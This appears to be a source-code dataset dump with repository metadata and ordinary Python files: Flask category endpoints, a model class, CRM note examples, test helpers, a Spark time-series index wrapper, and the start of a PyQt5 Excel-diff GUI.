    if "slug" in category_dict and category_dict["slug"] != "":
        category.slug = category_dict["slug"]
    if "hidden" in category_dict and category_dict["hidden"] != "":
        category.hidden = category_dict["hidden"]
    parent_dict = category_dict.get("parent", None)
    if parent_dict != None:
        parent_id = parent_dict.get("id", None)
        if parent_id != None:
            # Unlike add_category, a missing parent is silently ignored here.
            parent = Category.query.get(parent_id)
            if parent != None:
                category.parent = parent
    # Update the category and return updated document
    try:
        db.db.session.commit()
    except Exception as e:
        db.db.session.rollback()
        print(e)
        raise CategoryException("Could not edit category")
    tmp = category.to_dict()
    tmp["parent"] = category.parent_dict()
    tmp["children"] = category.children_dict()
    tmp["products"] = category.products_dict()
    return(json_util.dumps(tmp))
def get_category(category_id):
    """Return one category (with products, parent and children) as JSON."""
    cat = Category.query.get_or_404(category_id)
    payload = cat.to_dict()
    payload["products"] = cat.products_dict()
    payload["parent"] = cat.parent_dict()
    payload["children"] = cat.children_with_products_dict()
    return json_util.dumps(payload)
# Route registration: REST endpoints for the category collection and items.
category.add_url_rule('', view_func=get_categories, methods=['GET'])
category.add_url_rule('', view_func=add_category, methods=['POST'])
category.add_url_rule('/<string:category_id>', view_func=get_category, methods=['GET'])
category.add_url_rule('/<string:category_id>', view_func=edit_category, methods=['PUT'])
category.add_url_rule('/<string:category_id>', view_func=remove_category, methods=['DELETE'])
| 2,673 | 0 | 90 |
4cef688f598302dd4fb8215e03856c14259b75f8 | 314 | py | Python | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | null | null | null | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | null | null | null | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | 1 | 2021-07-07T21:37:54.000Z | 2021-07-07T21:37:54.000Z | #!/usr/bin/python3
""" Amenity module """
from models.base_model import BaseModel
class Amenity(BaseModel):
    """Amenity model: a named amenity attachable to a place.

    Attributes:
        name: public class attribute, the amenity's display name.
    """

    # Default empty name; instances are populated via BaseModel kwargs.
    name = ""

    def __init__(self, *args, **kwargs):
        """Delegate initialization to BaseModel.

        Bug fix: the previous code called ``super().__init__(self, *args,
        **kwargs)``, passing the instance a second time as a positional
        argument — zero-argument ``super()`` already binds ``self``.
        """
        super().__init__(*args, **kwargs)
| 20.933333 | 48 | 0.595541 | #!/usr/bin/python3
""" Amenity module """
from models.base_model import BaseModel
class Amenity(BaseModel):
    """Amenity model: a named amenity attachable to a place.

    Attributes:
        name: public class attribute, the amenity's display name.
    """

    # Default empty name; instances are populated via BaseModel kwargs.
    name = ""

    def __init__(self, *args, **kwargs):
        """Delegate initialization to BaseModel.

        Bug fix: the previous code called ``super().__init__(self, *args,
        **kwargs)``, passing the instance a second time as a positional
        argument — zero-argument ``super()`` already binds ``self``.
        """
        super().__init__(*args, **kwargs)
| 0 | 0 | 0 |
90378822fa36a0f7b05207caf56d8e08472ffb30 | 2,839 | py | Python | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | null | null | null | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | 1 | 2021-04-15T00:10:50.000Z | 2021-04-15T00:10:50.000Z | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | 4 | 2021-01-07T05:30:49.000Z | 2021-09-13T08:08:54.000Z | from copper_sdk.notes import NoteTarget
import names_generator
import json
import shared_procs
def create_task_note(copper_client, task_id, user_id):
"""Create a note for a Task
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
The new note.
"""
notes = copper_client.notes()
target = NoteTarget.Task
name = names_generator.generate_name(style="capital")
content = f"{name} greets you from Python"
return notes.push(target, task_id, content, user_id)
def get_task_notes(copper_client, task_id):
"""Get notes of a Task.
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
All notes for a Task.
"""
notes = copper_client.notes()
target = NoteTarget.Task
return notes.get(target, task_id)
def create_task_note_old(copper_client, task_id):
    """Create a note for a Task (old method).

    Bug fix: this function previously called ``pull_notes`` (which *reads*
    notes) while ``get_task_notes_old`` pushed one — the two bodies were
    swapped. It now generates a greeting note and pushes it, matching its
    documented contract and its use in ``run_old``.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.

    Returns:
        The new note.
    """
    name = names_generator.generate_name(style="capital")
    content = f"{name} greets you from Python"
    return copper_client.tasks().push_note(task_id, content)
def get_task_notes_old(copper_client, task_id):
    """Get notes of a Task (old method).

    Bug fix: this function previously generated and *pushed* a note while
    ``create_task_note_old`` pulled them — the two bodies were swapped.
    It now returns the Task's existing notes.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.

    Returns:
        All notes for a Task.
    """
    return copper_client.tasks().pull_notes(task_id)
def run_old(copper_client, config):
"""Old example on upload and download task notes.
This uses the notes fns of `copper_sdk.Task`.
"""
print("Old example on pushing Task Notes")
task_id = config["TASK_ID"]
print("Creating note for Task Id", task_id)
new_task_note = create_task_note_old(copper_client, task_id)
print("Note:", json.dumps(new_task_note))
shared_procs.wait()
print("Getting all notes for Task Id", task_id)
task_notes = get_task_notes_old(copper_client, task_id)
print(json.dumps(task_notes))
| 25.123894 | 69 | 0.659035 | from copper_sdk.notes import NoteTarget
import names_generator
import json
import shared_procs
def create_task_note(copper_client, task_id, user_id):
    """Create a note for a Task

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.
        user_id (int):
            The Id of the user the pushed note is attributed to.

    Returns:
        The new note.
    """
    notes = copper_client.notes()
    target = NoteTarget.Task
    # Note body is a randomly generated greeting, e.g. "Jolly Panda greets ...".
    name = names_generator.generate_name(style="capital")
    content = f"{name} greets you from Python"
    return notes.push(target, task_id, content, user_id)
def get_task_notes(copper_client, task_id):
    """Fetch every note attached to the given Task.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.

    Returns:
        All notes for a Task.
    """
    return copper_client.notes().get(NoteTarget.Task, task_id)
def run(copper_client, config):
    """Example driver: create one Task note, then list all notes of the Task.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        config (dict):
            Must contain "TASK_ID" and "USER_ID" entries.
    """
    print("Running Task Notes examples")
    task_id = config["TASK_ID"]
    user_id = int(config["USER_ID"])
    print("Creating note for Task Id", task_id)
    new_task_note = create_task_note(copper_client, task_id, user_id)
    print("Note:", json.dumps(new_task_note))
    # Pause between the write and the read — presumably to let the API
    # settle; see shared_procs.wait for the actual behavior.
    shared_procs.wait()
    print("Getting all notes for Task Id", task_id)
    task_notes = get_task_notes(copper_client, task_id)
    print(json.dumps(task_notes))
def create_task_note_old(copper_client, task_id):
    """Create a note for a Task (old method).

    Bug fix: this function previously called ``pull_notes`` (which *reads*
    notes) while ``get_task_notes_old`` pushed one — the two bodies were
    swapped. It now generates a greeting note and pushes it, matching its
    documented contract and its use in ``run_old``.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.

    Returns:
        The new note.
    """
    name = names_generator.generate_name(style="capital")
    content = f"{name} greets you from Python"
    return copper_client.tasks().push_note(task_id, content)
def get_task_notes_old(copper_client, task_id):
    """Get notes of a Task (old method).

    Bug fix: this function previously generated and *pushed* a note while
    ``create_task_note_old`` pulled them — the two bodies were swapped.
    It now returns the Task's existing notes.

    Attributes:
        copper_client (copper_sdk.copper):
            The CopperSDK client.
        task_id (str):
            The Id for the Task.

    Returns:
        All notes for a Task.
    """
    return copper_client.tasks().pull_notes(task_id)
def run_old(copper_client, config):
    """Old example on upload and download task notes.

    This uses the notes fns of `copper_sdk.Task`.
    """
    print("Old example on pushing Task Notes")
    tid = config["TASK_ID"]
    print("Creating note for Task Id", tid)
    print("Note:", json.dumps(create_task_note_old(copper_client, tid)))
    shared_procs.wait()
    print("Getting all notes for Task Id", tid)
    print(json.dumps(get_task_notes_old(copper_client, tid)))
| 453 | 0 | 23 |
224035c0366a11ebad1bfd43ff365d8376f86e1c | 328 | py | Python | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 18 | 2019-03-13T23:26:07.000Z | 2021-12-31T00:57:16.000Z | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 98 | 2015-12-13T12:18:24.000Z | 2018-08-07T21:10:46.000Z | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 17 | 2015-09-29T20:52:12.000Z | 2018-08-20T11:33:30.000Z | import os.path
from .. import generate
TEST_PATH = os.path.dirname(__file__)
| 17.263158 | 59 | 0.594512 | import os.path
from .. import generate
TEST_PATH = os.path.dirname(__file__)
def test_generate_params():
params = {
'foo': 'abc',
'bar': 'def',
}
template = "{{ foo }}{{ bar }}"
expected = "abcdef\n"
actual = generate.generate(params, TEST_PATH, template)
assert expected == actual
| 224 | 0 | 23 |
1419fdc8d5e49e33480adbbeae6baecc459e36d8 | 2,477 | py | Python | test/cli_test/base.py | nprint/nPrintML | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 13 | 2020-11-04T14:57:12.000Z | 2021-11-18T08:50:00.000Z | test/cli_test/base.py | nprint/nPrintML | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 60 | 2020-10-22T16:08:14.000Z | 2021-12-14T23:00:36.000Z | test/cli_test/base.py | nprint/nprintml | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 1 | 2021-12-16T01:10:18.000Z | 2021-12-16T01:10:18.000Z | import contextlib
import functools
import io
import pathlib
import sys
import typing
import unittest
from nprintml import cli
from test.base import mktestdir
TEST_ROOT = pathlib.Path(__file__).parent.parent
TEST_DATA = TEST_ROOT / 'data'
def testdir(func):
"""Decorator to wrap given function such that a temporary directory
is created and destroyed for each invocation.
"""
@functools.wraps(func)
return wrapper
| 27.21978 | 82 | 0.603553 | import contextlib
import functools
import io
import pathlib
import sys
import typing
import unittest
from nprintml import cli
from test.base import mktestdir
TEST_ROOT = pathlib.Path(__file__).parent.parent
TEST_DATA = TEST_ROOT / 'data'
def testdir(func):
    """Decorator to wrap given function such that a temporary directory
    is created and destroyed for each invocation.

    The directory path is appended to the wrapped function's positional
    arguments.
    """
    prefix = f'nprintml.{func.__module__}.{func.__name__}.'

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        with mktestdir(prefix) as tempdir:
            return func(*args, tempdir, **kwargs)

    return wrapper
class TeeIO:
    """File-like object that duplicates every write to all given targets."""

    def __init__(self, *targets):
        """Store the target streams writes will be fanned out to."""
        self.targets = targets

    def write(self, content):
        """Write ``content`` to each underlying target, in order."""
        for sink in self.targets:
            sink.write(content)
class CLITestCase(unittest.TestCase):
    """Base test case that runs the nprintml CLI with output capture."""
    class ExecutionResult(typing.NamedTuple):
        """Captured stdout/stderr (or None when not captured) and exit code."""
        stdout: typing.Optional[str]
        stderr: typing.Optional[str]
        code: typing.Optional[int]
        @classmethod
        def from_stringio(cls, stdout, stderr, code):
            """Build a result from StringIO buffers (each may be None)."""
            outputs = (None if output is None else output.getvalue()
                       for output in (stdout, stderr))
            return cls(*outputs, code)
    class CommandError(Exception):
        """Raised when the CLI exits non-zero and raise_exc is set."""
        def __init__(self, code, result):
            super().__init__(code, result.stdout, result.stderr)
            self.code = code
            self.result = result
    def try_execute(self, *argv, raise_exc=True, stdout=False, stderr=False):
        """Run ``cli.execute`` with argv, optionally teeing stdout/stderr.

        Captured streams are still mirrored to the real stdout/stderr via
        TeeIO. Returns an ExecutionResult; raises CommandError when the CLI
        exits with a code > 0 and ``raise_exc`` is true.
        """
        with contextlib.ExitStack() as stack:
            outputs = []
            # For each stream: capture into a StringIO while mirroring to
            # the original, or record None when capture is disabled.
            for (should_redirect, redirect_manager, output0) in (
                (stdout, contextlib.redirect_stdout, sys.stdout),
                (stderr, contextlib.redirect_stderr, sys.stderr),
            ):
                if should_redirect:
                    output1 = io.StringIO()
                    stack.enter_context(redirect_manager(TeeIO(output0, output1)))
                else:
                    output1 = None
                outputs.append(output1)
            code = None
            try:
                cli.execute(map(str, argv))
            except SystemExit as exc:
                code = exc.code
                # NOTE(review): sys.exit() with no argument gives code None,
                # making `code > 0` a TypeError on Python 3 — confirm the CLI
                # always exits with an integer code.
                if raise_exc and code > 0:
                    result = self.ExecutionResult.from_stringio(*outputs, code)
                    raise self.CommandError(exc.code, result) from exc
            return self.ExecutionResult.from_stringio(*outputs, code)
| 1,597 | 310 | 126 |
490e5c475bc83d2f42ea4de089689f8d1276f355 | 5,941 | py | Python | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | 1 | 2018-01-30T18:32:07.000Z | 2018-01-30T18:32:07.000Z | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | null | null | null | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | null | null | null | from py4j.java_gateway import java_import
from .utils import datetime_to_nanos
import numpy as np
import pandas as pd
class DateTimeIndex(object):
"""
A DateTimeIndex maintains a bi-directional mapping between integers and an ordered collection of
date-times. Multiple date-times may correspond to the same integer, implying multiple samples
at the same date-time.
To avoid confusion between the meaning of "index" as it appears in "DateTimeIndex" and "index"
as a location in an array, in the context of this class, we use "location", or "loc", to refer
to the latter.
"""
def __len__(self):
"""Returns the number of timestamps included in the index."""
return self._jdt_index.size()
def _zdt_to_nanos(self, zdt):
"""Extracts nanoseconds from a ZonedDateTime"""
instant = zdt.toInstant()
return instant.getNano() + instant.getEpochSecond() * 1000000000
def first(self):
"""Returns the earliest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.first()))
def last(self):
"""Returns the latest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.last()))
def datetime_at_loc(self, loc):
"""Returns the timestamp at the given integer location as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.dateTimeAtLoc(loc)))
def islice(self, start, end):
"""
Returns a new DateTimeIndex, containing a subslice of the timestamps in this index,
as specified by the given integer start and end locations.
Parameters
----------
start : int
The location of the start of the range, inclusive.
end : int
The location of the end of the range, exclusive.
"""
jdt_index = self._jdt_index.islice(start, end)
return DateTimeIndex(jdt_index=jdt_index)
def to_pandas_index(self):
"""Returns a pandas.DatetimeIndex representing the same date-times"""
# TODO: we can probably speed this up for uniform indices
arr = self._jdt_index.toNanosArray()
return pd.DatetimeIndex(arr)
class DayFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in days.
"""
class HourFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in hours.
"""
class BusinessDayFrequency(object):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in
business days. The first day of the business week is specified where Monday=1, Tuesday=2,
and so on.
"""
def uniform(start, end=None, periods=None, freq=None, sc=None):
"""
Instantiates a uniform DateTimeIndex.
Either end or periods must be specified.
Parameters
----------
start : string, long (nanos from epoch), or Pandas Timestamp
end : string, long (nanos from epoch), or Pandas Timestamp
periods : int
freq : a frequency object
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
if freq is None:
raise ValueError("Missing frequency")
elif end is None and periods == None:
raise ValueError("Need an end date or number of periods")
elif end is not None:
return DateTimeIndex(dtmodule.uniformFromInterval( \
datetime_to_nanos(start), datetime_to_nanos(end), freq._jfreq))
else:
return DateTimeIndex(dtmodule.uniform( \
datetime_to_nanos(start), periods, freq._jfreq))
def irregular(timestamps, sc):
"""
Instantiates an irregular DateTimeIndex.
Parameters
----------
timestamps : a Pandas DateTimeIndex, or an array of strings, longs (nanos from epoch), Pandas
Timestamps
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
arr = sc._gateway.new_array(sc._jvm.long, len(timestamps))
for i in xrange(len(timestamps)):
arr[i] = datetime_to_nanos(timestamps[i])
return DateTimeIndex(dtmodule.irregular(arr))
| 34.74269 | 101 | 0.66504 | from py4j.java_gateway import java_import
from .utils import datetime_to_nanos
import numpy as np
import pandas as pd
class DateTimeIndex(object):
    """
    A DateTimeIndex maintains a bi-directional mapping between integers and an ordered collection of
    date-times. Multiple date-times may correspond to the same integer, implying multiple samples
    at the same date-time.
    To avoid confusion between the meaning of "index" as it appears in "DateTimeIndex" and "index"
    as a location in an array, in the context of this class, we use "location", or "loc", to refer
    to the latter.
    """
    def __init__(self, jdt_index):
        """Wrap a JVM DateTimeIndex object accessed through py4j."""
        self._jdt_index = jdt_index
    def __len__(self):
        """Returns the number of timestamps included in the index."""
        return self._jdt_index.size()
    def _zdt_to_nanos(self, zdt):
        """Extracts nanoseconds from a ZonedDateTime"""
        instant = zdt.toInstant()
        # Epoch seconds scaled to nanos plus the sub-second nano component.
        return instant.getNano() + instant.getEpochSecond() * 1000000000
    def first(self):
        """Returns the earliest timestamp in the index, as a Pandas Timestamp."""
        return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.first()))
    def last(self):
        """Returns the latest timestamp in the index, as a Pandas Timestamp."""
        return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.last()))
    def datetime_at_loc(self, loc):
        """Returns the timestamp at the given integer location as a Pandas Timestamp."""
        return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.dateTimeAtLoc(loc)))
    def __getitem__(self, val):
        """Slice by a date-time range, or look up the location of one date-time."""
        # TODO: throw an error if the step size is defined
        if isinstance(val, slice):
            start = datetime_to_nanos(val.start)
            stop = datetime_to_nanos(val.stop)
            jdt_index = self._jdt_index.slice(start, stop)
            return DateTimeIndex(jdt_index)
        else:
            return self._jdt_index.locAtDateTime(datetime_to_nanos(val))
    def islice(self, start, end):
        """
        Returns a new DateTimeIndex, containing a subslice of the timestamps in this index,
        as specified by the given integer start and end locations.
        Parameters
        ----------
        start : int
            The location of the start of the range, inclusive.
        end : int
            The location of the end of the range, exclusive.
        """
        jdt_index = self._jdt_index.islice(start, end)
        return DateTimeIndex(jdt_index=jdt_index)
    def to_pandas_index(self):
        """Returns a pandas.DatetimeIndex representing the same date-times"""
        # TODO: we can probably speed this up for uniform indices
        arr = self._jdt_index.toNanosArray()
        return pd.DatetimeIndex(arr)
    def __eq__(self, other):
        """Delegate equality to the wrapped JVM index objects."""
        return self._jdt_index.equals(other._jdt_index)
    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self.__eq__(other)
    def __repr__(self):
        """Use the JVM index's own string rendering."""
        return self._jdt_index.toString()
class _Frequency(object):
def __eq__(self, other):
return self._jfreq.equals(other._jfreq)
def __ne__(self, other):
return not self.__eq__(other)
class DayFrequency(_Frequency):
    """
    A frequency that can be used for a uniform DateTimeIndex, where the period is given in days.
    """
    def __init__(self, days, sc):
        """Construct the JVM DayFrequency via the SparkContext's py4j gateway."""
        self._jfreq = sc._jvm.com.cloudera.sparkts.DayFrequency(days)
    def days(self):
        """Returns the period length in days."""
        return self._jfreq.days()
class HourFrequency(_Frequency):
    """
    A frequency that can be used for a uniform DateTimeIndex, where the period is given in hours.
    """
    def __init__(self, hours, sc):
        """Construct the JVM HourFrequency via the SparkContext's py4j gateway."""
        self._jfreq = sc._jvm.com.cloudera.sparkts.HourFrequency(hours)
    def hours(self):
        """Returns the period length in hours."""
        return self._jfreq.hours()
class BusinessDayFrequency(object):
    """
    A frequency that can be used for a uniform DateTimeIndex, where the period is given in
    business days. The first day of the business week is specified where Monday=1, Tuesday=2,
    and so on.
    """
    def __init__(self, bdays, firstDayOfWeek, sc):
        """Construct the JVM BusinessDayFrequency via the SparkContext's py4j gateway."""
        self._jfreq = sc._jvm.com.cloudera.sparkts.BusinessDayFrequency(bdays, firstDayOfWeek)
    # NOTE(review): __eq__/__ne__ duplicate _Frequency verbatim; this class
    # could inherit _Frequency like Day/HourFrequency do — confirm intent.
    def __eq__(self, other):
        """Two frequencies are equal when their JVM counterparts are."""
        return self._jfreq.equals(other._jfreq)
    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self.__eq__(other)
    def days(self):
        """Returns the period length in business days."""
        return self._jfreq.days()
def uniform(start, end=None, periods=None, freq=None, sc=None):
    """
    Instantiates a uniform DateTimeIndex.
    Either end or periods must be specified.
    Parameters
    ----------
    start : string, long (nanos from epoch), or Pandas Timestamp
    end : string, long (nanos from epoch), or Pandas Timestamp
    periods : int
    freq : a frequency object
    sc : SparkContext
    """
    # Validate arguments before touching the JVM gateway so bad input yields
    # a clear ValueError instead of an attribute error on ``sc``.
    # (Also fixes the non-idiomatic ``periods == None`` comparison.)
    if freq is None:
        raise ValueError("Missing frequency")
    if end is None and periods is None:
        raise ValueError("Need an end date or number of periods")
    dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
    if end is not None:
        return DateTimeIndex(dtmodule.uniformFromInterval(
            datetime_to_nanos(start), datetime_to_nanos(end), freq._jfreq))
    return DateTimeIndex(dtmodule.uniform(
        datetime_to_nanos(start), periods, freq._jfreq))
def irregular(timestamps, sc):
    """
    Instantiates an irregular DateTimeIndex.
    Parameters
    ----------
    timestamps : a Pandas DateTimeIndex, or an array of strings, longs (nanos from epoch), Pandas
        Timestamps
    sc : SparkContext
    """
    dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
    arr = sc._gateway.new_array(sc._jvm.long, len(timestamps))
    # Bug fix: the original used ``xrange``, which does not exist on
    # Python 3; ``enumerate`` works on both Python 2 and 3.
    for i, ts in enumerate(timestamps):
        arr[i] = datetime_to_nanos(ts)
    return DateTimeIndex(dtmodule.irregular(arr))
| 1,120 | 4 | 429 |
c1e20d70880881a9bc4a9d9ab9bb1e131bcbe8a5 | 22,838 | py | Python | MainWindow.py | Linzecong/ExcelDiffer | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 20 | 2019-03-04T11:11:30.000Z | 2022-03-14T06:52:46.000Z | MainWindow.py | hubuyaolian/ExcelDiffer-1 | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 3 | 2019-03-04T11:12:44.000Z | 2022-01-12T18:06:15.000Z | MainWindow.py | hubuyaolian/ExcelDiffer-1 | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 8 | 2019-03-28T11:07:39.000Z | 2022-01-03T19:45:52.000Z | #-*- codingg:utf8 -*-
from PyQt5.QtWidgets import QMainWindow,QFontDialog, QApplication,QMenu,QAction,QFileDialog,QDockWidget,QMessageBox,QDesktopWidget,QTableWidget
from PyQt5.QtGui import QIcon,QFont,QKeySequence
from PyQt5.QtCore import Qt,QSettings,QThread,pyqtSignal
from ViewWidget import ViewWidget
from DiffWidget import RowDiffWidget,CellDiffWidget,ColDiffWidget
from ChangeColorWidget import ChangeColorWidget
from Model import MyXlsx
from Algorithm import MyAlg
import sys,math,hashlib
# Script entry point: build the Qt application and show the main window.
if __name__=="__main__":
    app = QApplication(sys.argv)
    main = MainWindow()
    main.setWindowIcon(QIcon("icon/opennew.ico"))
    main.show()
sys.exit(app.exec_()) | 43.500952 | 193 | 0.645853 | #-*- codingg:utf8 -*-
from PyQt5.QtWidgets import QMainWindow,QFontDialog, QApplication,QMenu,QAction,QFileDialog,QDockWidget,QMessageBox,QDesktopWidget,QTableWidget
from PyQt5.QtGui import QIcon,QFont,QKeySequence
from PyQt5.QtCore import Qt,QSettings,QThread,pyqtSignal
from ViewWidget import ViewWidget
from DiffWidget import RowDiffWidget,CellDiffWidget,ColDiffWidget
from ChangeColorWidget import ChangeColorWidget
from Model import MyXlsx
from Algorithm import MyAlg
import sys,math,hashlib
class Thread(QThread):
    """Worker thread that computes one sheet diff off the GUI thread."""

    # Emitted with the finished diff dict (carries a "diffname" key naming the sheet).
    done = pyqtSignal(dict)

    def __init__(self, Window, name="###"):
        super().__init__()
        # "###" selects the default single-sheet diff engine in MainWindow.Alg.
        self.name = name
        self.window = Window

    def run(self):
        """Run the diff algorithm for this thread's sheet and publish the result."""
        diff = self.window.Alg[self.name].getSheetdiff()
        diff["diffname"] = self.name
        self.SheetDiff = diff
        self.done.emit(diff)
class OpenFileThread(QThread):
    """Worker thread that loads an Excel workbook without blocking the GUI."""

    def __init__(self, file):
        super().__init__()
        # Path of the workbook to open.
        self.file = file

    def run(self):
        """Parse the workbook; the caller reads .Xlrd after `finished` fires."""
        self.Xlrd = MyXlsx(self.file)
class MainWindow(QMainWindow):
    """Main application window for ExcelDiffer.

    Hosts the central old/new sheet views, three dock widgets listing row,
    column and cell level changes, the menus/toolbars, and drives the diff
    worker threads (Thread / OpenFileThread).
    """

    def __init__(self):
        super(MainWindow,self).__init__()
        self.isanaing = False  # True while a diff analysis is running
        self.setWindowTitle("ExcelDiffer")
        self.qss = True  # True = day mode (no stylesheet); toggled by changeQSS()
        self.IsAna = False  # True once an analysis has completed
        self.currentFont = self.font()
        self.initFont = self.font()
        self.ps = self.initFont.pointSize()  # default point size, used by "restore font"
        self.CentralWidget = ViewWidget()
        self.setCentralWidget(self.CentralWidget)
        # Dock listing row-level changes; clicking an entry highlights it in the tables.
        self.RowDiffWidget = RowDiffWidget()
        self.RowDiffDock = QDockWidget("行改动")  # create the dock widget
        self.RowDiffDock.setWidget(self.RowDiffWidget)  # place the list widget inside the dock
        self.RowDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures)  # movable/closable/floatable
        self.RowDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
        self.RowDiffDock.setObjectName("rowdiff")
        self.RowDiffWidget.RowAddListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"add_row",self.RowDiffWidget.RowAddListWidget.currentRow()))
        self.RowDiffWidget.RowDelListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_row",self.RowDiffWidget.RowDelListWidget.currentRow()))
        self.RowDiffWidget.RowExcListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"row_exchange",self.RowDiffWidget.RowExcListWidget.currentRow()))
        self.addDockWidget(Qt.LeftDockWidgetArea, self.RowDiffDock)
        # Dock listing column-level changes.
        self.ColDiffWidget = ColDiffWidget()
        self.ColDiffDock = QDockWidget("列改动")  # create the dock widget
        self.ColDiffDock.setWidget(self.ColDiffWidget)  # place the list widget inside the dock
        self.ColDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures)  # movable/closable/floatable
        self.ColDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
        self.ColDiffDock.setObjectName("coldiff")
        self.ColDiffWidget.ColAddListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"add_col",self.ColDiffWidget.ColAddListWidget.currentRow()))
        self.ColDiffWidget.ColDelListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_col",self.ColDiffWidget.ColDelListWidget.currentRow()))
        self.ColDiffWidget.ColExcListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"col_exchange",self.ColDiffWidget.ColExcListWidget.currentRow()))
        self.addDockWidget(Qt.LeftDockWidgetArea, self.ColDiffDock)
        # Dock listing cell-level changes (edits plus merged-cell additions/removals).
        self.CellDiffWidget = CellDiffWidget()
        self.CellDiffDock = QDockWidget("格改动")  # create the dock widget
        self.CellDiffDock.setWidget(self.CellDiffWidget)  # place the list widget inside the dock
        self.CellDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures)  # movable/closable/floatable
        self.CellDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
        self.CellDiffDock.setObjectName("celldiff")
        self.CellDiffWidget.CellDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"change_cell",self.CellDiffWidget.CellDiffListWidget.currentRow()))
        self.CellDiffWidget.MergeAddDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"new_merge",self.CellDiffWidget.MergeAddDiffListWidget.currentRow()))
        self.CellDiffWidget.MergeDelDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_merge",self.CellDiffWidget.MergeDelDiffListWidget.currentRow()))
        self.addDockWidget(Qt.RightDockWidgetArea, self.CellDiffDock)
        # Center the window on the available screen area.
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
        # Snapshot the pristine geometry/state so restoreToWinInit() can return to it.
        self.WinSettings = QSettings("ExcelDiffer", "ExcelDifferInit");
        self.WinSettings.setValue("geometry", self.saveGeometry());
        self.WinSettings.setValue("windowState", self.saveState());
        # Seed default highlight colors on first run.
        # NOTE(review): the key is spelled "hightlight" everywhere this app uses it;
        # keep the spelling for compatibility with settings already saved on disk.
